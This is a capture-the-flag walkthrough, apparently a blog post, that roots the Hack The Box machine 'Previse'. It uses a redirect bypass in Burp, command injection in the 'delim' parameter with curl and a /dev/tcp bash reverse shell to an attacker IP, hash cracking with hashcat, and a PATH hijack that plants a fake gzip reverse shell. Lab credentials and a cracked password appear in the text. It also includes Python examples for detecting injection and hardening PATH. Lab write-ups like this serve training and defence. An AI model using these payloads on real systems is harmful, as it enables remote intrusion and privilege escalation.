Previse

  • Admin
  • Apr 1, 2022
  • 3 min read

Let's start with Nmap:

nmap -sV 10.129.95.185

Let's go to the URL:


gobuster dir -u 10.129.95.185 -w /usr/share/dirb/wordlists/common.txt -x .php

Go to http://10.129.95.185/nav.php


Open burp

Go to proxy

Turn on intercept

Return to the website and click on "Create account" on the website

Go back to proxy

Click on Action --> Do intercept --> response to this request

Then click on Forward.


Change "302 Found" to "200 OK". The server redirects us away from the account-creation page but still sends the full page body along with the redirect, so presenting the response as a 200 lets the browser render that body instead of following the redirect.

Click on Forward.


This time we get access to the page to create a new account!


Turn off Intercept in Burp


So let's create an account:

username : hello123

password : hello123

Click on "Create user".


We are redirected to the login page.

Let's try to log in with our new account.


We are in!


Go to Files.

There is a file there.


Click on the file to download it.

Check out all the files in it.


Check config.php:


We got credentials to access a MySQL database!

username: root

password: mySQL_p@ssw0rd!:)


Go back to the website.

Under Management Menu --> Log Data


Click Submit.

We get a file with logs:


Let's use Burp to intercept the request that is sent when we click Submit to request the log data.

Go back to Management Menu --> Log Data

Open Burp and, under the Proxy tab, turn on Intercept.

Go back to the website and click on Submit

Go back to Burp to see what was intercepted:


Now we are going to append a command after delim=comma, as shown below:


Basically we are replacing:

delim=comma

by:

delim=comma%26curl+http%3a//10.10.14.49%3a4444

URL-encoded characters and their ASCII values:

%3a -----> :

%26 -----> &



Encoded:

delim=comma%26curl+http%3a//10.10.14.49%3a4444

Decoded:

delim=comma&curl+http://10.10.14.49:4444

We are basically making the target run curl against port 4444 of our VM. We are now going to listen on port 4444 on our VM and see whether the target connects back, which proves that our command is executed.

curl http://10.10.14.49:4444

Now, before we do anything else, open a new terminal on your VM, type the following netcat command and press Enter:

nc -lnvp 4444

Now that netcat is listening, and we have intercepted the request and changed delim=comma, let's click on Forward in Burp.


Click on Forward in Burp again.


It worked!


Stop the netcat listener on port 4444 for now (press Ctrl+C).


Now let's do this all over again, but this time we replay the request calling /bin/bash to get a reverse shell on port 6666:

  1. Start a new netcat listener with nc -lnvp 6666

  2. Change the payload from

delim=comma

to

delim=comma%26/bin/bash+-c+'bash+-i+>+/dev/tcp/10.10.14.49/6666+0>%261'

Decoded, this means:

delim=comma&/bin/bash -c 'bash -i > /dev/tcp/10.10.14.49/6666 0>&1'
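The curl payload and the bash payload above ride on the same weakness: the delim value is spliced into a shell command, so an encoded & (%26) ends the intended command and starts a new one. The following Python is an added example, not code from this writeup or from the Previse application: it shows the allowlist check a fixed exporter would apply to delim, and a detector that URL-decodes captured request bodies and flags parameters carrying shell syntax. The three sample bodies are constructed; two of them reproduce the payloads used above.

```python
from urllib.parse import parse_qs
import re

# Delimiter names the log exporter legitimately accepts, mapped to characters.
ALLOWED_DELIMS = {"comma": ",", "space": " ", "tab": "\t"}

# Shell syntax or tooling that has no business inside a delimiter parameter.
SHELL_META = re.compile(r"[;&|`$]|/dev/tcp/|\b(bash|sh|curl|nc|wget)\b")

# Constructed request bodies: one legitimate export, then the two payloads
# from the walkthrough above, exactly as they arrive (still URL-encoded).
SAMPLE_BODIES = [
    "delim=comma&page=1",
    "delim=comma%26curl+http%3a//10.10.14.49%3a4444",
    "delim=comma%26/bin/bash+-c+'bash+-i+>+/dev/tcp/10.10.14.49/6666+0>%261'",
]

def is_valid_delim(value: str) -> bool:
    """Allowlist check: the only acceptable values are the known names."""
    return value in ALLOWED_DELIMS

def safe_delim(value: str) -> str:
    """Resolve the delimiter name to a character; the raw string never
    reaches a shell. Raises ValueError for anything outside the allowlist."""
    if not is_valid_delim(value):
        raise ValueError(f"unsupported delimiter: {value!r}")
    return ALLOWED_DELIMS[value]

def analyse_body(body: str) -> dict:
    """Decode a form body the way the server does and return the parameters
    whose decoded value contains shell metacharacters or shell tooling."""
    findings = {}
    for name, values in parse_qs(body, keep_blank_values=True).items():
        for decoded in values:            # parse_qs already URL-decodes
            if SHELL_META.search(decoded):
                findings[name] = decoded
    return findings

def scan_requests(bodies) -> list:
    """Run analyse_body over captured bodies; returns (index, findings)."""
    return [(i, f) for i, b in enumerate(bodies) if (f := analyse_body(b))]

if __name__ == "__main__":
    for index, findings in scan_requests(SAMPLE_BODIES):
        print(f"request {index}: suspicious parameters {findings}")
```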

In Burp, click on Forward.


We got the shell again!

Type id


As usual, let's upgrade it to a proper TTY by typing:

python3 -c 'import pty;pty.spawn("/bin/bash")'

Earlier we found the database credentials in config.php.

From there, let's connect to the MySQL database using:

mysql -u root -p

When prompted for the password, type the one found in the file earlier:

mySQL_p@ssw0rd!:)

We are in!


show databases;

use previse;

show tables;

SELECT * FROM accounts;

$1$🧂llol$DQpmdvnb7EeuO6UaqRItf.


Save the hash into a file called hashed.txt.


We can use hashcat to recover the password. Mode 500 is md5crypt, which the $1$ prefix of the hash indicates:

hashcat -m 500 hashed.txt /opt/useful/SecLists/Passwords/Leaked-Databases/rockyou.txt

This might take a few minutes; hashcat estimates about 14 minutes. Just wait.

Press s if you want to see the status:


Finished! We got the password below:

ilovecody112235!


Done! We got the password for m4lwhere.


We know from the Nmap scan we ran at the very beginning that port 22 is open, which is SSH. Let's now try to SSH to the target machine using the username m4lwhere we found earlier.

ssh m4lwhere@10.129.95.185

When prompted for the password, type the password we just found:

ilovecody112235!


It worked and we are in!

ls
cat user.txt

You got the user flag! Congratulations!


As usual, let's run:

sudo -l

When prompted for the password for m4lwhere, type:

ilovecody112235!


We find that the user m4lwhere can run the following commands on Previse:

(root) /opt/scripts/access_backup.sh


Let's first check what this script does:

cat /opt/scripts/access_backup.sh

The script calls gzip by name rather than by absolute path, so the binary is resolved through PATH. Check where gzip currently resolves to:

which gzip

cd /tmp
echo "bash -i >& /dev/tcp/10.10.14.49/9080 0>&1" > gzip

This creates a file called gzip in /tmp.

The file just contains:

bash -i >& /dev/tcp/10.10.14.49/9080 0>&1

chmod +x gzip

This gives our new gzip file execute permission.

export PATH=/tmp:$PATH

This puts /tmp at the front of PATH, so when the script runs gzip it finds our file before the real binary.


Open a new terminal on your VM and type:

nc -lnvp 9080

Now go back to the m4lwhere@previse shell and type:

sudo /opt/scripts/access_backup.sh

When you return to your netcat listener, you will notice you got a shell, and we are root!
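The privilege escalation works because the sudo-able script looks gzip up through PATH and a caller-controlled PATH is honoured. As an added example (not the box's own /opt/scripts/access_backup.sh, whose contents the writeup does not reproduce; SAMPLE_SCRIPT is a constructed stand-in), this Python audit reports watched commands that a script resolves through PATH and pins PATH at the top of the script so the lookup no longer depends on the caller's environment.

```python
import re
import shlex

# Commands a backup script plausibly invokes; extend for your environment.
WATCHED = {"gzip", "tar", "cp", "mv", "rm", "find", "date", "cat"}
# Pinned lookup path; sudo's secure_path option, where set, is a second layer.
SAFE_PATH = "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"

# Constructed stand-in for a script that sudo lets a user run as root.
SAMPLE_SCRIPT = """#!/bin/bash
gzip -c /var/log/apache2/access.log > /var/backups/access.gz
/bin/chmod 600 /var/backups/access.gz
"""

def bare_commands(script: str) -> list:
    """Return (line number, command) for each watched command that the
    script resolves through PATH instead of calling by absolute path."""
    hits = []
    for lineno, line in enumerate(script.splitlines(), 1):
        code = line.split("#", 1)[0]                # drop comments and shebang
        for segment in re.split(r"[|;&]+", code):   # crude pipeline/list split
            try:
                words = shlex.split(segment)
            except ValueError:                      # unbalanced quotes: skip
                continue
            if words and "/" not in words[0] and words[0] in WATCHED:
                hits.append((lineno, words[0]))
    return hits

def sets_path(script: str) -> bool:
    """True if the script assigns PATH itself (PATH=... or export PATH=...)."""
    return re.search(r"^\s*(export\s+)?PATH=", script, re.M) is not None

def harden(script: str) -> str:
    """Insert a fixed PATH right after the shebang so that a caller's
    'export PATH=/tmp:$PATH' cannot decide which gzip the script runs."""
    if sets_path(script):
        return script
    lines = script.splitlines()
    at = 1 if lines and lines[0].startswith("#!") else 0
    lines.insert(at, SAFE_PATH)
    return "\n".join(lines) + "\n"

if __name__ == "__main__":
    for lineno, cmd in bare_commands(SAMPLE_SCRIPT):
        print(f"line {lineno}: '{cmd}' is resolved through PATH")
    print(harden(SAMPLE_SCRIPT))
```

Calling commands by absolute path inside the script (for example /bin/gzip) closes the same hole without depending on PATH at all.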


cd ..
cd root
ls
cat root.txt

Congratulations! You got the root flag!

 
 
 


1 Comment

Guest, Jul 01, 2023 (rated 5 out of 5 stars):

Thanks!!

©2025 by My Tech On IT
